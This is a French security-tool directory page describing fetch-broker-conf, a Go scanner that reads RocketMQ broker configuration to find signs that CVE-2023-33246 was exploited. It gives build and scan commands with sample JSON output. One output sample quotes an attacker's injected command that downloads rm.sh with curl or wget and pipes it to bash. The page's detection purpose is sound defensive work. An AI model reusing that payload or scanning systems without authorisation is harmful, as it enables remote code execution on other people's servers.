Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
fetch-broker-conf — Un exploit en Go pour récupérer la configuration du courtier RocketMQ afin de découvrir des indicateurs de compromission pour CVE-2023-33246 | Kitploit
Outils/GitHubGitHub/vulncheck-oss/fetch-broker-conf
Gestion des Indicateurs de Compromission (IOC)Analyse des VulnérabilitésExploitationCollecte d'InformationsTests d'IntrusionRéponse aux Incidents
GitHubvulncheck-oss/fetch-broker-conf

fetch-broker-conf

Un exploit en Go pour récupérer la configuration du courtier RocketMQ afin de découvrir des indicateurs de compromission pour CVE-2023-33246

Voir le dépôt
51il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

Fetch Broker Configuration

Fetch Broker Configuration tentera de télécharger la configuration du broker RocketMQ afin de rechercher des indicateurs de compromission dans la variable rocketmqHome. Cette variable est utilisée par divers attaquants pour exécuter du code via CVE-2023-33246. Pour plus de détails, consultez le blog de VulnCheck.

Compilation

Vous pouvez utiliser le makefile pour construire un conteneur docker :

root@kitploit:~
make docker

Ou, si vous avez un environnement de compilation Go prêt, utilisez simplement make :

root@kitploit:~
albinolobster@mournland:~/fetch-broker-conf$ make
gofmt -d -w main.go
golangci-lint run --fix main.go
GOOS=linux GOARCH=arm64 go build -o build/main_linux-arm64 main.go

Utilisation

L'outil est construit sur go-exploit, il existe donc plusieurs façons de fournir des cibles à analyser. Une description complète se trouve dans la documentation de scan du projet. Cependant, voici quelques exemples :

Analyse d'un seul hôte

root@kitploit:~
albinolobster@mournland:~/fetch-broker-conf$ ./build/main_linux-arm64 -a -e -rhost 10.9.49.143 -rport 10911 -log-json true | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-09-05T05:27:48.567836165-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.143",
  "port": 10911
}

Analyse de plusieurs hôtes

root@kitploit:~
albinolobster@mournland:~/fetch-broker-conf$ ./build/main_linux-arm64 -a -e -rhosts 10.9.49.143,10.9.49.150 -rport 10911 -log-json true | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-09-05T05:34:27.505747211-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.143",
  "port": 10911
}
{
  "time": "2023-09-05T05:34:27.802345043-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.150",
  "port": 10911
}

Analyse d'un fichier d'hôtes avec un proxy

go-exploit permet d'analyser via un fichier CSV de cibles, où le CSV est : host, port, anything if ssl is enabled (bien que le champ SSL soit ignoré si -a est utilisé). Il permet également d'analyser via un proxy. La commande fonctionne comme suit (notez que -a est la détection automatique SSL) :

root@kitploit:~
albinolobster@mournland:~/rocketmq-broker-conf$ ./build/main_linux-arm64 -a -e -rhosts-file /tmp/rocketmq.csv -proxy socks5://127.0.0.1:9050 -log-json true 2>/dev/null | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-08-31T13:45:35.781849255-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "-c $@|sh . echo (curl -s x.x.x.x/rm.sh||wget -q -O- x.x.x.x/rm.sh)|bash;",
  "host": "x.x.x.x",
  "port": 10909
}
Télécharger l’outil